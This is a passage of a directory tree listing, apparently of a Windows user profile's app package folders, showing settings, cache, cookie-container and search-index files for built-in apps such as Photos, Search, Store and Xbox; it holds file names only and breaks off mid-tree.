│   │       │   │   │   ├── Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.ParentalControls_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.Photos_8wekyb3d8bbwe
│   │       │   │   │   │   ├── LocalState
│   │       │   │   │   │   │   ├── MediaDb.v1.sqlite
│   │       │   │   │   │   │   ├── MediaDb.v1.sqlite-shm
│   │       │   │   │   │   │   ├── MediaDb.v1.sqlite-wal
│   │       │   │   │   │   │   └── PhotosAppTracing_startedInBGMode.etl
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.Search_cw5n1h2txyewy
│   │       │   │   │   │   ├── AC
│   │       │   │   │   │   │   ├── AppCache
│   │       │   │   │   │   │   │   ├── container.dat
│   │       │   │   │   │   │   │   └── TH7LOWPQ
│   │       │   │   │   │   │   │       ├── 7
│   │       │   │   │   │   │   │       │   ├── 12OaRJ-2U1hcmKFncIXhbX1j62g.br[1].js
│   │       │   │   │   │   │   │       │   ├── 4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br[1].js
│   │       │   │   │   │   │   │       │   ├── 5QbvUbPr5h0JJWRuMvsG58molFw.br[1].js
│   │       │   │   │   │   │   │       │   ├── 8jAwzw6Qsvvds_KGvS39nm1fTBg.br[1].js
│   │       │   │   │   │   │   │       │   ├── aABLNT_FV45QjYQfnRHrBCAk4GU[1].js
│   │       │   │   │   │   │   │       │   ├── appcache[1].man
│   │       │   │   │   │   │   │       │   ├── AptopUBu7_oVDubJxwvaIprW-lI[1].css
│   │       │   │   │   │   │   │       │   ├── bHkaUYJYpLyeWL37QERwrSA6M-A.br[1].js
│   │       │   │   │   │   │   │       │   ├── container.dat
│   │       │   │   │   │   │   │       │   ├── Cup3Is1bdaUS3C5__G12HeKRFUk.br[1].js
│   │       │   │   │   │   │   │       │   ├── DpZSAH7iRtfJbl95939MzwjALrg.br[1].js
│   │       │   │   │   │   │   │       │   ├── F-9phXC_0uAqQQFuRafyV39z6Dk.br[1].js
│   │       │   │   │   │   │   │       │   ├── FBodW3lwNP5Qe6iF-d8dpJdC9lc.br[1].js
│   │       │   │   │   │   │   │       │   ├── FgBbpIj0thGWZOh_xFnM9i4O7ek[1].css
│   │       │   │   │   │   │   │       │   ├── h2m6AVCpDtS8Ff3ZxuDGx1A2-O8.br[1].js
│   │       │   │   │   │   │   │       │   ├── heAYUxfILYlJF05e-8lkGwIhhvk.br[1].js
│   │       │   │   │   │   │   │       │   ├── HSjqqNAf8A6tH6cRSo4u7MnAgQo.br[1].js
│   │       │   │   │   │   │   │       │   ├── HTtwxidvByGPeR1IbVBmzc6JMFE[1].css
│   │       │   │   │   │   │   │       │   ├── I9IcNC5Fm4eIVI1W7MOj8TQLJnM.br[1].js
│   │       │   │   │   │   │   │       │   ├── IfessBb5oalKa0BiFziddjCU6s0.br[1].js
│   │       │   │   │   │   │   │       │   ├── ikpPfkLjP14eKCzM16ksiFVp92Y.br[1].js
│   │       │   │   │   │   │   │       │   ├── Init[1].htm
│   │       │   │   │   │   │   │       │   ├── -iNIzuEypRdgRJ6xnyVHizZ3bpM.br[1].js
│   │       │   │   │   │   │   │       │   ├── JfHPfqlXBkmAm0Qtf5mbiNPZs9I.br[1].js
│   │       │   │   │   │   │   │       │   ├── kH22K8qkhqsRJBHVREydfyCsX5Q.br[1].js
│   │       │   │   │   │   │   │       │   ├── Kkc0vUYaO2t8Idtv8pP1mO5kI-U.br[1].js
│   │       │   │   │   │   │   │       │   ├── kNbCYqhbl7rciqSWM997NnFjqpE[1].css
│   │       │   │   │   │   │   │       │   ├── mNTNSYmdkpZ8dkFq4cRJ9JsSlUg[1].css
│   │       │   │   │   │   │   │       │   ├── onra7PQl9o5bYT2lASI1BE4DDEs[1].css
│   │       │   │   │   │   │   │       │   ├── p6wm2WLb8ijauB9Ev6BJn8A1qO0.br[1].js
│   │       │   │   │   │   │   │       │   ├── pa4SAazw9dzjA566NnHnw7sTAWk.br[1].js
│   │       │   │   │   │   │   │       │   ├── q11NvYzJks_3Zy5BRKPM9baeQ7M.br[1].js
│   │       │   │   │   │   │   │       │   ├── Q_qmYa-oymDLrKP18xwpe3q1Twg.br[1].js
│   │       │   │   │   │   │   │       │   ├── RGSO4sEmvYv8wsttX4XoQuFoMMM.br[1].js
│   │       │   │   │   │   │   │       │   ├── rUQ8SSsIzKcgb77SIOCfnAbpfB4.br[1].js
│   │       │   │   │   │   │   │       │   ├── syUVAYIRowNlK3WkXP45a-Eil98.br[1].js
│   │       │   │   │   │   │   │       │   ├── t8nWDcgsFP2om7RRQLGAsaCDrXw.br[1].js
│   │       │   │   │   │   │   │       │   ├── tUCiVcVWZ-go7BLlq95YW6bKHZE[1].css
│   │       │   │   │   │   │   │       │   ├── v5zOzwO-WGATNbZYbsbP_IKg6LU.br[1].js
│   │       │   │   │   │   │   │       │   ├── V62NxFhQFWhp7IHxFC6BHteG_58[1].js
│   │       │   │   │   │   │   │       │   ├── v6GNSutG8z2AYJfNy2W0_QdViPU.br[1].js
│   │       │   │   │   │   │   │       │   ├── v86e0X_ci1X8eYRZtuX_JUnLuFw.br[1].js
│   │       │   │   │   │   │   │       │   ├── XF2HFdw72Rd8XFupFwNm2lLP_9M.br[1].js
│   │       │   │   │   │   │   │       │   ├── XKZ41694P7XbcLcfFJwPjCvgy20.br[1].js
│   │       │   │   │   │   │   │       │   ├── ZBE20uhSHfCu187YygD8my6jfpU.br[1].js
│   │       │   │   │   │   │   │       │   └── zHPj2y5saY1e83_ximnrlqZqrr0.br[1].js
│   │       │   │   │   │   │   │       └── container.dat
│   │       │   │   │   │   │   ├── INetCache
│   │       │   │   │   │   │   │   ├── 68NROCDD
│   │       │   │   │   │   │   │   │   ├── th[1].svg
│   │       │   │   │   │   │   │   │   ├── th[2].svg
│   │       │   │   │   │   │   │   │   ├── trans[1].gif
│   │       │   │   │   │   │   │   │   ├── trans[2].gif
│   │       │   │   │   │   │   │   │   └── trans[3].gif
│   │       │   │   │   │   │   │   ├── 8EJ1CSVG
│   │       │   │   │   │   │   │   │   ├── ANzUnPnVY0oL0XWxs0RLJxjJLUo.br[1].js
│   │       │   │   │   │   │   │   │   ├── th[1].svg
│   │       │   │   │   │   │   │   │   ├── th[2].svg
│   │       │   │   │   │   │   │   │   ├── trans[1].gif
│   │       │   │   │   │   │   │   │   └── trans[2].gif
│   │       │   │   │   │   │   │   ├── container.dat
│   │       │   │   │   │   │   │   ├── EVGP4C0H
│   │       │   │   │   │   │   │   │   ├── fpconfig.min[1].json
│   │       │   │   │   │   │   │   │   ├── th[1].svg
│   │       │   │   │   │   │   │   │   ├── th[2].svg
│   │       │   │   │   │   │   │   │   └── trans[1].gif
│   │       │   │   │   │   │   │   ├── MSIMGSIZ.DAT
│   │       │   │   │   │   │   │   └── NWRG6VXJ
│   │       │   │   │   │   │   │       ├── th[1].jpg
│   │       │   │   │   │   │   │       ├── th[1].svg
│   │       │   │   │   │   │   │       ├── th[2].svg
│   │       │   │   │   │   │   │       ├── trans[1].gif
│   │       │   │   │   │   │   │       └── trans[2].gif
│   │       │   │   │   │   │   ├── INetCookies
│   │       │   │   │   │   │   │   └── ESE
│   │       │   │   │   │   │   │       └── container.dat
│   │       │   │   │   │   │   ├── Microsoft
│   │       │   │   │   │   │   │   ├── CryptnetUrlCache
│   │       │   │   │   │   │   │   │   ├── Content
│   │       │   │   │   │   │   │   │   │   ├── 26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
│   │       │   │   │   │   │   │   │   │   ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │   │   │   │   ├── 7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
│   │       │   │   │   │   │   │   │   │   ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │   │   │   │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
│   │       │   │   │   │   │   │   │   │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
│   │       │   │   │   │   │   │   │   │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
│   │       │   │   │   │   │   │   │   │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
│   │       │   │   │   │   │   │   │   │   └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   │   │   │   └── MetaData
│   │       │   │   │   │   │   │   │       ├── 26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
│   │       │   │   │   │   │   │   │       ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │   │   │       ├── 7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
│   │       │   │   │   │   │   │   │       ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │   │   │       ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
│   │       │   │   │   │   │   │   │       ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
│   │       │   │   │   │   │   │   │       ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
│   │       │   │   │   │   │   │   │       ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
│   │       │   │   │   │   │   │   │       └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   │   │   └── Internet Explorer
│   │       │   │   │   │   │   │       └── DOMStore
│   │       │   │   │   │   │   │           ├── AU4DWQHA
│   │       │   │   │   │   │   │           │   └── www.bing[1].xml
│   │       │   │   │   │   │   │           └── container.dat
│   │       │   │   │   │   │   └── TokenBroker
│   │       │   │   │   │   │       └── Cache
│   │       │   │   │   │   │           ├── 95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres
│   │       │   │   │   │   │           └── fbaf94e759052658216786bfbabcdced1b67a5c2.tbres
│   │       │   │   │   │   ├── AppData
│   │       │   │   │   │   │   ├── CacheStorage
│   │       │   │   │   │   │   │   ├── CacheStorage.edb
│   │       │   │   │   │   │   │   └── CacheStorage.jfm
│   │       │   │   │   │   │   └── Indexed DB
│   │       │   │   │   │   │       ├── edb.chk
│   │       │   │   │   │   │       ├── edb.log
│   │       │   │   │   │   │       ├── edbres00001.jrs
│   │       │   │   │   │   │       ├── edbres00002.jrs
│   │       │   │   │   │   │       ├── edbtmp.log
│   │       │   │   │   │   │       ├── IndexedDB.edb
│   │       │   │   │   │   │       └── IndexedDB.jfm
│   │       │   │   │   │   ├── LocalState
│   │       │   │   │   │   │   ├── AppIconCache
│   │       │   │   │   │   │   │   └── 100
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cmd_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_magnify_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_mspaint_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_narrator_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_notepad_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_osk_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WFS_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe
│   │       │   │   │   │   │   │       ├── {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe
│   │       │   │   │   │   │   │       ├── {6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe
│   │       │   │   │   │   │   │       ├── {6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe
│   │       │   │   │   │   │   │       ├── {D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_odbcad32_exe
│   │       │   │   │   │   │   │       ├── {D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe
│   │       │   │   │   │   │   │       ├── {D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe
│   │       │   │   │   │   │   │       ├── {F38BF404-1D43-42F2-9305-67DE0B28FC23}_regedit_exe
│   │       │   │   │   │   │   │       ├── Microsoft_549981C3F5F10_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_AutoGenerated_{8AA47365-B2B3-1961-69EB-F866E376B12F}
│   │       │   │   │   │   │   │       ├── Microsoft_AutoGenerated_{8ABD94FB-E7D6-84A6-A997-C918EDDE0AE5}
│   │       │   │   │   │   │   │       ├── Microsoft_AutoGenerated_{923DD477-5846-686B-A659-0FCCD73851A8}
│   │       │   │   │   │   │   │       ├── Microsoft_AutoGenerated_{BB044BFD-25B7-2FAA-22A8-6371A93E0456}
│   │       │   │   │   │   │   │       ├── Microsoft_AutoGenerated_{BD3F924E-55FB-A1BA-9DE6-B50F9F2460AC}
│   │       │   │   │   │   │   │       ├── Microsoft_AutoGenerated_{C1C6F8AC-40A3-0F5C-146F-65A9DC70BBB4}
│   │       │   │   │   │   │   │       ├── Microsoft_AutoGenerated_{C3487933-BE48-A825-BDE0-5DDE03CE6F0A}
│   │       │   │   │   │   │   │       ├── Microsoft_AutoGenerated_{C804BBA7-FA5F-CBF7-8B55-2096E5F972CB}
│   │       │   │   │   │   │   │       ├── Microsoft_AutoGenerated_{DAA168DE-4306-C8BC-8C11-B596240BDDED}
│   │       │   │   │   │   │   │       ├── Microsoft_BingWeather_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_GetHelp_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_Getstarted_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_InternetExplorer_Default
│   │       │   │   │   │   │   │       ├── Microsoft_Microsoft3DViewer_8wekyb3d8bbwe!Microsoft_Microsoft3DViewer
│   │       │   │   │   │   │   │       ├── Microsoft_MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft_MicrosoftOfficeHub
│   │       │   │   │   │   │   │       ├── Microsoft_MicrosoftSolitaireCollection_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_MicrosoftStickyNotes_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_MixedReality_Portal_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_MSPaint_8wekyb3d8bbwe!Microsoft_MSPaint
│   │       │   │   │   │   │   │       ├── Microsoft_Office_OneNote_8wekyb3d8bbwe!microsoft_onenoteim
│   │       │   │   │   │   │   │       ├── Microsoft_People_8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x
│   │       │   │   │   │   │   │       ├── Microsoft_ScreenSketch_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_SkyDrive_Desktop
│   │       │   │   │   │   │   │       ├── Microsoft_SkypeApp_kzf8qxf38zg5c!App
│   │       │   │   │   │   │   │       ├── Microsoft_Windows_AdministrativeTools
│   │       │   │   │   │   │   │       ├── Microsoft_WindowsAlarms_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_WindowsCalculator_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_WindowsCamera_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_calendar
│   │       │   │   │   │   │   │       ├── microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_mail
│   │       │   │   │   │   │   │       ├── Microsoft_Windows_Computer
│   │       │   │   │   │   │   │       ├── Microsoft_Windows_ControlPanel
│   │       │   │   │   │   │   │       ├── Microsoft_Windows_Explorer
│   │       │   │   │   │   │   │       ├── Microsoft_WindowsFeedbackHub_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_WindowsMaps_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_Windows_MediaPlayer32
│   │       │   │   │   │   │   │       ├── Microsoft_Windows_Photos_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_Windows_RemoteDesktop
│   │       │   │   │   │   │   │       ├── Microsoft_Windows_SecHealthUI_cw5n1h2txyewy!SecHealthUI
│   │       │   │   │   │   │   │       ├── Microsoft_Windows_Shell_RunDialog
│   │       │   │   │   │   │   │       ├── Microsoft_WindowsSoundRecorder_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_WindowsStore_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_XboxApp_8wekyb3d8bbwe!Microsoft_XboxApp
│   │       │   │   │   │   │   │       ├── Microsoft_XboxGamingOverlay_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_YourPhone_8wekyb3d8bbwe!App
│   │       │   │   │   │   │   │       ├── Microsoft_ZuneMusic_8wekyb3d8bbwe!Microsoft_ZuneMusic
│   │       │   │   │   │   │   │       ├── Microsoft_ZuneVideo_8wekyb3d8bbwe!Microsoft_ZuneVideo
│   │       │   │   │   │   │   │       ├── MSEdge
│   │       │   │   │   │   │   │       └── windows_immersivecontrolpanel_cw5n1h2txyewy!microsoft_windows_immersivecontrolpanel
│   │       │   │   │   │   │   ├── ConstraintIndex
│   │       │   │   │   │   │   │   ├── Apps_{82f86e79-1e6c-4aef-a096-e399f9b5483c}
│   │       │   │   │   │   │   │   │   ├── 0.0.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │   │   ├── 0.1.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │   │   ├── 0.2.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │   │   ├── Apps.ft
│   │       │   │   │   │   │   │   │   └── Apps.index
│   │       │   │   │   │   │   │   ├── Apps_{9e100941-3852-4f41-969a-c1bc3cf05997}
│   │       │   │   │   │   │   │   │   ├── 0.0.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │   │   ├── 0.1.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │   │   ├── 0.2.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │   │   ├── Apps.ft
│   │       │   │   │   │   │   │   │   └── Apps.index
│   │       │   │   │   │   │   │   ├── Input_{c35999e5-5930-4e39-9cf1-43840021bace}
│   │       │   │   │   │   │   │   │   ├── appsconversions.txt
│   │       │   │   │   │   │   │   │   ├── apps.csg
│   │       │   │   │   │   │   │   │   ├── appsglobals.txt
│   │       │   │   │   │   │   │   │   ├── apps.schema
│   │       │   │   │   │   │   │   │   ├── appssynonyms.txt
│   │       │   │   │   │   │   │   │   ├── settingsconversions.txt
│   │       │   │   │   │   │   │   │   ├── settings.csg
│   │       │   │   │   │   │   │   │   ├── settingsglobals.txt
│   │       │   │   │   │   │   │   │   ├── settings.schema
│   │       │   │   │   │   │   │   │   └── settingssynonyms.txt
│   │       │   │   │   │   │   │   ├── Settings_{0cb612ef-f332-4975-bda4-7f281a210a65}
│   │       │   │   │   │   │   │   │   ├── 0.0.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │   │   ├── 0.1.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │   │   ├── 0.2.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │   │   ├── Settings.ft
│   │       │   │   │   │   │   │   │   └── Settings.index
│   │       │   │   │   │   │   │   └── Settings_{12c9aa4a-3644-49c3-91ac-24c749a8fec0}
│   │       │   │   │   │   │   │       ├── 0.0.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │       ├── 0.1.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │       ├── 0.2.filtertrie.intermediate.txt
│   │       │   │   │   │   │   │       ├── Settings.ft
│   │       │   │   │   │   │   │       └── Settings.index
│   │       │   │   │   │   │   ├── DeviceSearchCache
│   │       │   │   │   │   │   │   ├── AppCache133997666853414147.txt
│   │       │   │   │   │   │   │   ├── AppCache133997666931411418.txt
│   │       │   │   │   │   │   │   ├── AppCache133997666979241086.txt
│   │       │   │   │   │   │   │   ├── AppCache133997667160997333.txt
│   │       │   │   │   │   │   │   ├── AppCache133997667313221221.txt
│   │       │   │   │   │   │   │   ├── AppCache133997667476868926.txt
│   │       │   │   │   │   │   │   ├── AppCache133997673439917406.txt
│   │       │   │   │   │   │   │   ├── AppCache133997676440520258.txt
│   │       │   │   │   │   │   │   ├── AppCache133997676737592545.txt
│   │       │   │   │   │   │   │   ├── AppCache133997677036511349.txt
│   │       │   │   │   │   │   │   ├── AppCache133997679695044080.txt
│   │       │   │   │   │   │   │   ├── AppCache133997681424121100.txt
│   │       │   │   │   │   │   │   ├── AppCache133997681946766625.txt
│   │       │   │   │   │   │   │   ├── AppCache133997682071495180.txt
│   │       │   │   │   │   │   │   ├── AppCache133997682458137951.txt
│   │       │   │   │   │   │   │   ├── AppCache133997682898295967.txt
│   │       │   │   │   │   │   │   ├── AppCache133997682976532898.txt
│   │       │   │   │   │   │   │   ├── AppCache133997683207055720.txt
│   │       │   │   │   │   │   │   ├── AppCache134001821369228722.txt
│   │       │   │   │   │   │   │   ├── AppCache134001824124531383.txt
│   │       │   │   │   │   │   │   ├── AppCache134001848284766987.txt
│   │       │   │   │   │   │   │   └── SettingsCache.txt
│   │       │   │   │   │   │   ├── Flighting
│   │       │   │   │   │   │   │   └── FlightingLogging.txt
│   │       │   │   │   │   │   └── ShellFeeds
│   │       │   │   │   │   │       ├── GLEAM-DARK.svg
│   │       │   │   │   │   │       └── GLEAM-LIGHT.svg
│   │       │   │   │   │   ├── Settings
│   │       │   │   │   │   │   ├── roaming.lock
│   │       │   │   │   │   │   ├── settings.dat
│   │       │   │   │   │   │   ├── settings.dat.LOG1
│   │       │   │   │   │   │   └── settings.dat.LOG2
│   │       │   │   │   │   └── TempState
│   │       │   │   │   │       └── CortanaUnifiedTileModelCache.dat
│   │       │   │   │   ├── Microsoft.Windows.SecHealthUI_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
│   │       │   │   │   │   ├── Settings
│   │       │   │   │   │   │   ├── roaming.lock
│   │       │   │   │   │   │   ├── settings.dat
│   │       │   │   │   │   │   ├── settings.dat.LOG1
│   │       │   │   │   │   │   └── settings.dat.LOG2
│   │       │   │   │   │   └── TempState
│   │       │   │   │   │       ├── StartUnifiedTileModelCache.dat
│   │       │   │   │   │       ├── TileCache_100_3_PNGEncoded_Data.bin
│   │       │   │   │   │       └── TileCache_100_3_PNGEncoded_Header.bin
│   │       │   │   │   ├── Microsoft.WindowsStore_8wekyb3d8bbwe
│   │       │   │   │   │   ├── AC
│   │       │   │   │   │   │   ├── INetCache
│   │       │   │   │   │   │   │   └── container.dat
│   │       │   │   │   │   │   ├── INetCookies
│   │       │   │   │   │   │   │   └── ESE
│   │       │   │   │   │   │   │       └── container.dat
│   │       │   │   │   │   │   └── Microsoft
│   │       │   │   │   │   │       └── CryptnetUrlCache
│   │       │   │   │   │   │           ├── Content
│   │       │   │   │   │   │           │   ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │           │   ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │           │   ├── B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0
│   │       │   │   │   │   │           │   └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   │           └── MetaData
│   │       │   │   │   │   │               ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │               ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │               ├── B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0
│   │       │   │   │   │   │               └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.XboxApp_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.XboxGameCallableUI_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.XboxGameOverlay_8wekyb3d8bbwe
│   │       │   │   │   │   ├── LocalState
